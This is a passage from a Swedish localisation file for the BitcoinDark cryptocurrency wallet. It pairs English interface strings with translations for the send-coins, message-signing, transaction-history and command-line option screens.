<translation>Bekräfta sändordern</translation>
</message>
<message>
<location line="+3"/>
<source>S&end</source>
<translation>&Skicka</translation>
</message>
<message>
<location filename="../sendcoinsdialog.cpp" line="-173"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark-adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+15"/>
<source>Copy quantity</source>
<translation>Kopiera antal</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="+1"/>
<source>Copy fee</source>
<translation>Kopiera avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy after fee</source>
<translation>Kopiera efter avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy bytes</source>
<translation>Kopiera bytes</translation>
</message>
<message>
<location line="+1"/>
<source>Copy priority</source>
<translation>Kopiera prioritet</translation>
</message>
<message>
<location line="+1"/>
<source>Copy low output</source>
<translation>Kopiera låg utmatning</translation>
</message>
<message>
<location line="+1"/>
<source>Copy change</source>
<translation>Kopiera ändring</translation>
</message>
<message>
<location line="+86"/>
<source><b>%1</b> to %2 (%3)</source>
<translation><b>%1</b> till %2 (%3)</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm send coins</source>
<translation>Bekräfta sändning av mynt</translation>
</message>
<message>
<location line="+1"/>
<source>Are you sure you want to send %1?</source>
<translation>Är du säker att du vill skicka %1?</translation>
</message>
<message>
<location line="+0"/>
<source> and </source>
<translation> och </translation>
</message>
<message>
<location line="+29"/>
<source>The recipient address is not valid, please recheck.</source>
<translation>Mottagarens adress är inte giltig, vänligen kontrollera igen.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount to pay must be larger than 0.</source>
<translation>Det betalade beloppet måste vara större än 0.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount exceeds your balance.</source>
<translation>Värdet överstiger ditt saldo.</translation>
</message>
<message>
<location line="+5"/>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>Totalvärdet överstiger ditt saldo när transaktionsavgiften %1 är pålagd.</translation>
</message>
<message>
<location line="+6"/>
<source>Duplicate address found, can only send to each address once per send operation.</source>
<translation>Dubblett av adress funnen, kan bara skicka till varje adress en gång per sändning.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: Transaction creation failed.</source>
<translation>Fel: Transaktionen kunde inte skapas.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>Fel: Transaktionen nekades. Detta kan hända om vissa av mynten i din plånbok redan är använda, t.ex. om du använder en kopia av wallet.dat och mynten redan var använda i kopian men inte markerade som använda här.</translation>
</message>
<message>
<location line="+251"/>
<source>WARNING: Invalid BitcoinDark address</source>
<translation>VARNING: Ogiltig BitcoinDark-adress</translation>
</message>
<message>
<location line="+13"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
<message>
<location line="+4"/>
<source>WARNING: unknown change address</source>
<translation>VARNING: okänd växeladress</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<location filename="../forms/sendcoinsentry.ui" line="+14"/>
<source>Form</source>
<translation>Formulär</translation>
</message>
<message>
<location line="+15"/>
<source>A&mount:</source>
<translation>&Belopp:</translation>
</message>
<message>
<location line="+13"/>
<source>Pay &To:</source>
<translation>Betala &Till:</translation>
</message>
<message>
<location line="+24"/>
<location filename="../sendcoinsentry.cpp" line="+25"/>
<source>Enter a label for this address to add it to your address book</source>
<translation>Ange ett namn för den här adressen och lägg till den i din adressbok</translation>
</message>
<message>
<location line="+9"/>
<source>&Label:</source>
<translation>&Etikett:</translation>
</message>
<message>
<location line="+18"/>
<source>The address to send the payment to (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen att skicka betalningen till (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+10"/>
<source>Choose address from address book</source>
<translation>Välj adress från adressbok</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="+7"/>
<source>Paste address from clipboard</source>
<translation>Klistra in adress från Urklipp</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+7"/>
<source>Remove this recipient</source>
<translation>Ta bort denna mottagare</translation>
</message>
<message>
<location filename="../sendcoinsentry.cpp" line="+1"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark-adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<location filename="../forms/signverifymessagedialog.ui" line="+14"/>
<source>Signatures - Sign / Verify a Message</source>
<translation>Signaturer - Signera / Verifiera ett Meddelande</translation>
</message>
<message>
<location line="+13"/>
<location line="+124"/>
<source>&Sign Message</source>
<translation>&Signera Meddelande</translation>
</message>
<message>
<location line="-118"/>
<source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source>
<translation>Du kan signera meddelanden med dina adresser för att bevisa att du äger dem. Var försiktig med vad du signerar, eftersom phishing-attacker kan försöka lura dig att signera över din identitet till någon annan. Signera endast väldetaljerade påståenden som du kan gå i god för.</translation>
</message>
<message>
<location line="+18"/>
<source>The address to sign the message with (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen att signera meddelandet med (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+10"/>
<location line="+203"/>
<source>Choose an address from the address book</source>
<translation>Välj en adress från adressboken</translation>
</message>
<message>
<location line="-193"/>
<location line="+203"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="-193"/>
<source>Paste address from clipboard</source>
<translation>Klistra in adress från Urklipp</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+12"/>
<source>Enter the message you want to sign here</source>
<translation>Skriv in meddelandet du vill signera här</translation>
</message>
<message>
<location line="+24"/>
<source>Copy the current signature to the system clipboard</source>
<translation>Kopiera signaturen till systemets Urklipp</translation>
</message>
<message>
<location line="+21"/>
<source>Sign the message to prove you own this BitcoinDark address</source>
<translation>Signera meddelandet för att bevisa att du äger denna BitcoinDark-adress</translation>
</message>
<message>
<location line="+17"/>
<source>Reset all sign message fields</source>
<translation>Rensa alla fält</translation>
</message>
<message>
<location line="+3"/>
<location line="+146"/>
<source>Clear &All</source>
<translation>Rensa &alla</translation>
</message>
<message>
<location line="-87"/>
<location line="+70"/>
<source>&Verify Message</source>
<translation>&Verifiera Meddelande</translation>
</message>
<message>
<location line="-64"/>
<source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message. Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source>
<translation>Skriv in signeringsadressen, meddelandet (se till att du kopierar radbrytningar, mellanslag, tabbar osv. exakt) och signaturen nedan för att verifiera meddelandet. Var noga med att inte läsa in mer i signaturen än vad som finns i det signerade meddelandet, för att undvika att luras av en man-in-the-middle-attack.</translation>
</message>
<message>
<location line="+21"/>
<source>The address the message was signed with (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen meddelandet var signerad med (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+40"/>
<source>Verify the message to ensure it was signed with the specified BitcoinDark address</source>
<translation>Verifiera meddelandet för att säkerställa att det signerades med den angivna BitcoinDark-adressen</translation>
</message>
<message>
<location line="+17"/>
<source>Reset all verify message fields</source>
<translation>Rensa alla fält</translation>
</message>
<message>
<location filename="../signverifymessagedialog.cpp" line="+27"/>
<location line="+3"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark-adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="-2"/>
<source>Click "Sign Message" to generate signature</source>
<translation>Klicka "Signera Meddelande" för att få en signatur</translation>
</message>
<message>
<location line="+3"/>
<source>Enter BitcoinDark signature</source>
<translation>Fyll i BitcoinDark-signatur</translation>
</message>
<message>
<location line="+82"/>
<location line="+81"/>
<source>The entered address is invalid.</source>
<translation>Den angivna adressen är ogiltig.</translation>
</message>
<message>
<location line="-81"/>
<location line="+8"/>
<location line="+73"/>
<location line="+8"/>
<source>Please check the address and try again.</source>
<translation>Var god kontrollera adressen och försök igen.</translation>
</message>
<message>
<location line="-81"/>
<location line="+81"/>
<source>The entered address does not refer to a key.</source>
<translation>Den angivna adressen refererar inte till en nyckel.</translation>
</message>
<message>
<location line="-73"/>
<source>Wallet unlock was cancelled.</source>
<translation>Upplåsningen av plånboken avbröts.</translation>
</message>
<message>
<location line="+8"/>
<source>Private key for the entered address is not available.</source>
<translation>Den privata nyckeln för den angivna adressen är inte tillgänglig.</translation>
</message>
<message>
<location line="+12"/>
<source>Message signing failed.</source>
<translation>Signeringen av meddelandet misslyckades.</translation>
</message>
<message>
<location line="+5"/>
<source>Message signed.</source>
<translation>Meddelandet är signerat.</translation>
</message>
<message>
<location line="+59"/>
<source>The signature could not be decoded.</source>
<translation>Signaturen kunde inte avkodas.</translation>
</message>
<message>
<location line="+0"/>
<location line="+13"/>
<source>Please check the signature and try again.</source>
<translation>Kontrollera signaturen och försök igen.</translation>
</message>
<message>
<location line="+0"/>
<source>The signature did not match the message digest.</source>
<translation>Signaturen matchade inte meddelandesammanfattningen.</translation>
</message>
<message>
<location line="+7"/>
<source>Message verification failed.</source>
<translation>Meddelandet verifikation misslyckades.</translation>
</message>
<message>
<location line="+5"/>
<source>Message verified.</source>
<translation>Meddelandet är verifierat.</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<location filename="../transactiondesc.cpp" line="+19"/>
<source>Open until %1</source>
<translation>Öppet till %1</translation>
</message>
<message numerus="yes">
<location line="-2"/>
<source>Open for %n block(s)</source>
<translation><numerusform>Öppen för %n block</numerusform><numerusform>Öppen för %n block</numerusform></translation>
</message>
<message>
<location line="+8"/>
<source>conflicted</source>
<translation>konflikt</translation>
</message>
<message>
<location line="+2"/>
<source>%1/offline</source>
<translation>%1/nerkopplad</translation>
</message>
<message>
<location line="+2"/>
<source>%1/unconfirmed</source>
<translation>%1/obekräftade</translation>
</message>
<message>
<location line="+2"/>
<source>%1 confirmations</source>
<translation>%1 bekräftelser</translation>
</message>
<message>
<location line="+18"/>
<source>Status</source>
<translation>Status</translation>
</message>
<message numerus="yes">
<location line="+7"/>
<source>, broadcast through %n node(s)</source>
<translation><numerusform>, sänd genom %n nod</numerusform><numerusform>, sänd genom %n noder</numerusform></translation>
</message>
<message>
<location line="+4"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+7"/>
<source>Source</source>
<translation>Källa</translation>
</message>
<message>
<location line="+0"/>
<source>Generated</source>
<translation>Genererad</translation>
</message>
<message>
<location line="+5"/>
<location line="+17"/>
<source>From</source>
<translation>Från</translation>
</message>
<message>
<location line="+1"/>
<location line="+22"/>
<location line="+58"/>
<source>To</source>
<translation>Till</translation>
</message>
<message>
<location line="-77"/>
<location line="+2"/>
<source>own address</source>
<translation>egen adress</translation>
</message>
<message>
<location line="-2"/>
<source>label</source>
<translation>etikett</translation>
</message>
<message>
<location line="+37"/>
<location line="+12"/>
<location line="+45"/>
<location line="+17"/>
<location line="+30"/>
<source>Credit</source>
<translation>Kredit</translation>
</message>
<message numerus="yes">
<location line="-102"/>
<source>matures in %n more block(s)</source>
<translation><numerusform>mognar om %n block till</numerusform><numerusform>mognar om %n block till</numerusform></translation>
</message>
<message>
<location line="+2"/>
<source>not accepted</source>
<translation>inte accepterad</translation>
</message>
<message>
<location line="+44"/>
<location line="+8"/>
<location line="+15"/>
<location line="+30"/>
<source>Debit</source>
<translation>Debet</translation>
</message>
<message>
<location line="-39"/>
<source>Transaction fee</source>
<translation>Transaktionsavgift</translation>
</message>
<message>
<location line="+16"/>
<source>Net amount</source>
<translation>Nettobelopp</translation>
</message>
<message>
<location line="+6"/>
<source>Message</source>
<translation>Meddelande</translation>
</message>
<message>
<location line="+2"/>
<source>Comment</source>
<translation>Kommentar</translation>
</message>
<message>
<location line="+2"/>
<source>Transaction ID</source>
<translation>Transaktions-ID</translation>
</message>
<message>
<location line="+3"/>
<source>Generated coins must mature 110 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to "not accepted" and it won't be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source>
<translation>Genererade mynt måste mogna i 110 block innan de kan användas. När du genererade detta block sändes det ut till nätverket för att läggas till i blockkedjan. Om det inte kan läggas till i kedjan kommer dess status att ändras till "inte accepterad" och det kommer inte att gå att använda. Detta kan hända emellanåt om en annan nod genererar ett block inom ett par sekunder från ditt.</translation>
</message>
<message>
<location line="+7"/>
<source>Debug information</source>
<translation>Debuginformation</translation>
</message>
<message>
<location line="+8"/>
<source>Transaction</source>
<translation>Transaktion</translation>
</message>
<message>
<location line="+5"/>
<source>Inputs</source>
<translation>Ingångar</translation>
</message>
<message>
<location line="+23"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+1"/>
<source>true</source>
<translation>sant</translation>
</message>
<message>
<location line="+0"/>
<source>false</source>
<translation>falskt</translation>
</message>
<message>
<location line="-211"/>
<source>, has not been successfully broadcast yet</source>
<translation>, har inte lyckats skickas ännu</translation>
</message>
<message>
<location line="+35"/>
<source>unknown</source>
<translation>okänd</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<location filename="../forms/transactiondescdialog.ui" line="+14"/>
<source>Transaction details</source>
<translation>Transaktionsdetaljer</translation>
</message>
<message>
<location line="+6"/>
<source>This pane shows a detailed description of the transaction</source>
<translation>Den här panelen visar en detaljerad beskrivning av transaktionen</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<location filename="../transactiontablemodel.cpp" line="+226"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+0"/>
<source>Type</source>
<translation>Typ</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+0"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+60"/>
<source>Open until %1</source>
<translation>Öppet till %1</translation>
</message>
<message>
<location line="+12"/>
<source>Confirmed (%1 confirmations)</source>
<translation>Bekräftad (%1 bekräftelser)</translation>
</message>
<message numerus="yes">
<location line="-15"/>
<source>Open for %n more block(s)</source>
<translation><numerusform>Öppet i %n block till</numerusform><numerusform>Öppet i %n block till</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Offline</source>
<translation>Nerkopplad</translation>
</message>
<message>
<location line="+3"/>
<source>Unconfirmed</source>
<translation>Obekräftad</translation>
</message>
<message>
<location line="+3"/>
<source>Confirming (%1 of %2 recommended confirmations)</source>
<translation>Bekräftar (%1 av %2 rekommenderade bekräftelser)</translation>
</message>
<message>
<location line="+6"/>
<source>Conflicted</source>
<translation>Konflikt</translation>
</message>
<message>
<location line="+3"/>
<source>Immature (%1 confirmations, will be available after %2)</source>
<translation>Omogen (%1 bekräftelser, kommer bli tillgänglig efter %2)</translation>
</message>
<message>
<location line="+3"/>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>Det här blocket togs inte emot av några andra noder och kommer antagligen inte att bli godkänt!</translation>
</message>
<message>
<location line="+3"/>
<source>Generated but not accepted</source>
<translation>Genererad men inte accepterad</translation>
</message>
<message>
<location line="+42"/>
<source>Received with</source>
<translation>Mottagen med</translation>
</message>
<message>
<location line="+2"/>
<source>Received from</source>
<translation>Mottaget från</translation>
</message>
<message>
<location line="+3"/>
<source>Sent to</source>
<translation>Skickad till</translation>
</message>
<message>
<location line="+2"/>
<source>Payment to yourself</source>
<translation>Betalning till dig själv</translation>
</message>
<message>
<location line="+2"/>
<source>Mined</source>
<translation>Genererade</translation>
</message>
<message>
<location line="+38"/>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<location line="+190"/>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>Transaktionsstatus. Håll muspekaren över för att se antal bekräftelser.</translation>
</message>
<message>
<location line="+2"/>
<source>Date and time that the transaction was received.</source>
<translation>Tidpunkt då transaktionen mottogs.</translation>
</message>
<message>
<location line="+2"/>
<source>Type of transaction.</source>
<translation>Transaktionstyp.</translation>
</message>
<message>
<location line="+2"/>
<source>Destination address of transaction.</source>
<translation>Transaktionens destinationsadress.</translation>
</message>
<message>
<location line="+2"/>
<source>Amount removed from or added to balance.</source>
<translation>Belopp draget eller tillagt till balans.</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<location filename="../transactionview.cpp" line="+55"/>
<location line="+16"/>
<source>All</source>
<translation>Alla</translation>
</message>
<message>
<location line="-15"/>
<source>Today</source>
<translation>Idag</translation>
</message>
<message>
<location line="+1"/>
<source>This week</source>
<translation>Denna vecka</translation>
</message>
<message>
<location line="+1"/>
<source>This month</source>
<translation>Denna månad</translation>
</message>
<message>
<location line="+1"/>
<source>Last month</source>
<translation>Föregående månad</translation>
</message>
<message>
<location line="+1"/>
<source>This year</source>
<translation>Det här året</translation>
</message>
<message>
<location line="+1"/>
<source>Range...</source>
<translation>Period...</translation>
</message>
<message>
<location line="+11"/>
<source>Received with</source>
<translation>Mottagen med</translation>
</message>
<message>
<location line="+2"/>
<source>Sent to</source>
<translation>Skickad till</translation>
</message>
<message>
<location line="+2"/>
<source>To yourself</source>
<translation>Till dig själv</translation>
</message>
<message>
<location line="+1"/>
<source>Mined</source>
<translation>Genererade</translation>
</message>
<message>
<location line="+1"/>
<source>Other</source>
<translation>Övriga</translation>
</message>
<message>
<location line="+7"/>
<source>Enter address or label to search</source>
<translation>Sök efter adress eller etikett </translation>
</message>
<message>
<location line="+7"/>
<source>Min amount</source>
<translation>Minsta mängd</translation>
</message>
<message>
<location line="+34"/>
<source>Copy address</source>
<translation>Kopiera adress</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>Kopiera etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="+1"/>
<source>Copy transaction ID</source>
<translation>Kopiera transaktions-ID</translation>
</message>
<message>
<location line="+1"/>
<source>Edit label</source>
<translation>Ändra etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Show transaction details</source>
<translation>Visa transaktionsdetaljer</translation>
</message>
<message>
<location line="+144"/>
<source>Export Transaction Data</source>
<translation>Exportera transaktionsdata</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>Kommaseparerad fil (*.csv)</translation>
</message>
<message>
<location line="+8"/>
<source>Confirmed</source>
<translation>Bekräftad</translation>
</message>
<message>
<location line="+1"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+1"/>
<source>Type</source>
<translation>Typ</translation>
</message>
<message>
<location line="+1"/>
<source>Label</source>
<translation>Etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+1"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+1"/>
<source>ID</source>
<translation>ID</translation>
</message>
<message>
<location line="+4"/>
<source>Error exporting</source>
<translation>Fel vid exportering</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>Kunde inte skriva till filen %1.</translation>
</message>
<message>
<location line="+100"/>
<source>Range:</source>
<translation>Intervall:</translation>
</message>
<message>
<location line="+8"/>
<source>to</source>
<translation>till</translation>
</message>
</context>
<context>
<name>WalletModel</name>
<message>
<location filename="../walletmodel.cpp" line="+206"/>
<source>Sending...</source>
<translation>Skickar...</translation>
</message>
</context>
<context>
<name>bitcoin-core</name>
<message>
<location filename="../bitcoinstrings.cpp" line="+33"/>
<source>BitcoinDark version</source>
<translation>BitcoinDark version</translation>
</message>
<message>
<location line="+1"/>
<source>Usage:</source>
<translation>Användning:</translation>
</message>
<message>
<location line="+1"/>
<source>Send command to -server or BitcoinDarkd</source>
<translation>Skicka kommando till -server eller BitcoinDarkd</translation>
</message>
<message>
<location line="+1"/>
<source>List commands</source>
<translation>Lista kommandon</translation>
</message>
<message>
<location line="+1"/>
<source>Get help for a command</source>
<translation>Få hjälp med ett kommando</translation>
</message>
<message>
<location line="+2"/>
<source>Options:</source>
<translation>Inställningar:</translation>
</message>
<message>
<location line="+2"/>
<source>Specify configuration file (default: BitcoinDark.conf)</source>
<translation>Ange konfigurationsfilen (standard: BitcoinDark.conf)</translation>
</message>
<message>
<location line="+1"/>
<source>Specify pid file (default: BitcoinDarkd.pid)</source>
<translation>Ange pid-filen (standard: BitcoinDarkd.pid)</translation>
</message>
<message>
<location line="+2"/>
<source>Specify wallet file (within data directory)</source>
<translation>Ange plånboksfil (inom datakatalogen)</translation>
</message>
<message>
<location line="-1"/>
<source>Specify data directory</source>
<translation>Ange katalog för data</translation>
</message>
<message>
<location line="+2"/>
<source>Set database cache size in megabytes (default: 25)</source>
<translation>Sätt databasens cachestorlek i megabyte (förvalt: 25)</translation>
</message>
<message>
<location line="+1"/>
<source>Set database disk log size in megabytes (default: 100)</source>
<translation>Sätt databasens loggstorlek på disk i megabyte (standard: 100)</translation>
</message>
<message>
<location line="+6"/>
<source>Listen for connections on <port> (default: 15714 or testnet: 25714)</source>
<translation>Lyssna efter anslutningar på <port> (standard: 15714 eller testnät: 25714)</translation>
</message>
<message>
<location line="+1"/>
<source>Maintain at most <n> connections to peers (default: 125)</source>
<translation>Ha som mest <n> anslutningar till andra klienter (förvalt: 125)</translation>
</message>
<message>
<location line="+3"/>
<source>Connect to a node to retrieve peer addresses, and disconnect</source>
<translation>Anslut till en nod för att hämta klientadresser, och koppla från</translation>
</message>
<message>
<location line="+1"/>
<source>Specify your own public address</source>
<translation>Ange din egen publika adress</translation>
</message>
<message>
<location line="+5"/>
<source>Bind to given address. Use [host]:port notation for IPv6</source>
<translation>Bind till angiven adress. Använd [host]:port för IPv6</translation>
</message>
<message>
<location line="+2"/>
<source>Stake your coins to support network and gain reward (default: 1)</source>
<translation>Använd dina coins för stake-processen, du upprätthåller då nätverket och får belöning (förval: 1)</translation>
</message>
<message>
<location line="+5"/>
<source>Threshold for disconnecting misbehaving peers (default: 100)</source>
<translation>Tröskelvärde för att koppla ifrån klienter som missköter sig (förvalt: 100)</translation>
</message>
<message>
<location line="+1"/>
<source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source>
<translation>Antal sekunder att hindra klienter som missköter sig från att ansluta (förvalt: 86400)</translation>
</message>
<message>
<location line="-44"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source>
<translation>Ett fel uppstod vid upprättandet av RPC port %u för att lyssna på IPv4: %s</translation>
</message>
<message>
<location line="+51"/>
<source>Detach block and address databases. Increases shutdown time (default: 0)</source>
<translation>Koppla ifrån block- och adressdatabaser. Ökar nedstängningstiden (standard: 0)</translation>
</message>
<message>
<location line="+109"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>Fel: Transaktionen nekades. Detta kan hända om vissa av mynten i din plånbok redan är använda, t.ex. om du använde en kopia av wallet.dat och mynten spenderades i kopian men inte markerades som använda här.</translation>
</message>
<message>
<location line="-5"/>
<source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds </source>
<translation>Fel: Transaktionen kräver en transaktionsavgift på minst %s på grund av dess storlek, komplexitet eller användning av nyligen mottagna medel</translation>
</message>
<message>
<location line="-87"/>
<source>Listen for JSON-RPC connections on <port> (default: 15715 or testnet: 25715)</source>
<translation>Lyssna efter JSON-RPC anslutningar på <port> (standard: 15715 eller testnät: 25715)</translation>
</message>
<message>
<location line="-11"/>
<source>Accept command line and JSON-RPC commands</source>
<translation>Tillåt kommandon från kommandotolken och JSON-RPC-kommandon</translation>
</message>
<message>
<location line="+101"/>
<source>Error: Transaction creation failed </source>
<translation>Fel: Skapandet av transaktion misslyckades</translation>
</message>
<message>
<location line="-5"/>
<source>Error: Wallet locked, unable to create transaction </source>
<translation>Fel: Plånboken låst, kan inte utföra transaktion</translation>
</message>
<message>
<location line="-8"/>
<source>Importing blockchain data file.</source>
<translation>Importerar blockchain-datafil.</translation>
</message>
<message>
<location line="+1"/>
<source>Importing bootstrap blockchain data file.</source>
<translation>Importerar blockchain-datafil för bootstrap.</translation>
</message>
<message>
<location line="-88"/>
<source>Run in the background as a daemon and accept commands</source>
<translation>Kör i bakgrunden som tjänst och acceptera kommandon</translation>
</message>
<message>
<location line="+1"/>
<source>Use the test network</source>
<translation>Använd testnätverket</translation>
</message>
<message>
<location line="-24"/>
<source>Accept connections from outside (default: 1 if no -proxy or -connect)</source>
<translation>Acceptera anslutningar utifrån (förvalt: 1 om ingen -proxy eller -connect)</translation>
</message>
<message>
<location line="-38"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source>
<translation>Ett fel uppstod vid upprättandet av RPC port %u för att lyssna på IPv6, faller tillbaka till IPv4: %s</translation>
</message>
<message>
<location line="+117"/>
<source>Error initializing database environment %s! To recover, BACKUP THAT DIRECTORY, then remove everything from it except for wallet.dat.</source>
<translation>Ett fel uppstod vid initialiseringen av databasen %s! För att återställa, SÄKERHETSKOPIERA MAPPEN, radera sedan allt från mappen förutom wallet.dat.</translation>
</message>
<message>
<location line="-20"/>
<source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source>
<translation>Ställ in maxstorlek för högprioritets-/lågavgiftstransaktioner i byte (förval: 27000)</translation>
</message>
<message>
<location line="+11"/>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>Varning: -paytxfee är satt väldigt högt! Detta är transaktionsavgiften du kommer att betala om du skickar en transaktion.</translation>
</message>
<message>
<location line="+61"/>
<source>Warning: Please check that your computer's date and time are correct! If your clock is wrong BitcoinDark will not work properly.</source>
<translation>Varning: Kontrollera att din dators tid och datum är rätt! BitcoinDark kan inte fungera ordentligt om tiden i datorn är fel.</translation>
</message>
<message>
<location line="-31"/>
<source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source>
<translation>Varning: fel vid läsning av wallet.dat! Alla nycklar lästes korrekt, men transaktionsdatan eller adressbokens poster kanske saknas eller är felaktiga.</translation>
</message>
<message>
<location line="-18"/>
<source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source>
<translation>Varning: wallet.dat korrupt, datan har räddats! Den ursprungliga wallet.dat har sparas som wallet.{timestamp}.bak i %s; om ditt saldo eller transaktioner är felaktiga ska du återställa från en säkerhetskopia.</translation>
</message>
<message>
<location line="-30"/>
<source>Attempt to recover private keys from a corrupt wallet.dat</source>
<translation>Försök att rädda de privata nycklarna från en korrupt wallet.dat</translation>
</message>
<message>
<location line="+4"/>
<source>Block creation options:</source>
<translation>Block skapande inställningar:</translation>
</message>
<message>
<location line="-62"/>
<source>Connect only to the specified node(s)</source>
<translation>Koppla enbart upp till den/de specificerade noden/noder</translation>
</message>
<message>
<location line="+4"/>
<source>Discover own IP address (default: 1 when listening and no -externalip)</source>
<translation>Hitta egen IP-adress (förvalt: 1 under lyssning och utan -externalip)</translation>
</message>
<message>
<location line="+94"/>
<source>Failed to listen on any port. Use -listen=0 if you want this.</source>
<translation>Misslyckades att lyssna på någon port. Använd -listen=0 om du vill detta.</translation>
</message>
<message>
<location line="-90"/>
<source>Find peers using DNS lookup (default: 1)</source>
<translation>Hitta andra klienter via DNS-uppslagning (standard: 1)</translation>
</message>
<message>
<location line="+5"/>
<source>Sync checkpoints policy (default: strict)</source>
<translation>Policy för synkning av kontrollpunkter (standard: strict)</translation>
</message>
<message>
<location line="+83"/>
<source>Invalid -tor address: '%s'</source>
<translation>Ogiltig -tor-adress: '%s'</translation>
</message>
<message>
<location line="+4"/>
<source>Invalid amount for -reservebalance=<amount></source>
<translation>Ogiltigt belopp för -reservebalance=<amount></translation>
</message>
<message>
<location line="-82"/>
<source>Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000)</source>
<translation>Maximal buffert för mottagning per anslutning, <n>*1000 byte (förvalt: 5000)</translation>
</message>
<message>
<location line="+1"/>
<source>Maximum per-connection send buffer, <n>*1000 bytes (default: 1000)</source>
<translation>Maximal buffert för sändning per anslutning, <n>*1000 byte (förvalt: 1000)</translation>
</message>
<message>
<location line="-16"/>
<source>Only connect to nodes in network <net> (IPv4, IPv6 or Tor)</source>
<translation>Anslut enbart till noder i nätverket <net> (IPv4, IPv6 eller Tor)</translation>
</message>
<message>
<location line="+28"/>
<source>Output extra debugging information. Implies all other -debug* options</source>
<translation>Skriv ut extra felsökningsinformation. Innefattar alla andra -debug*-alternativ</translation>
</message>
<message>
<location line="+1"/>
<source>Output extra network debugging information</source>
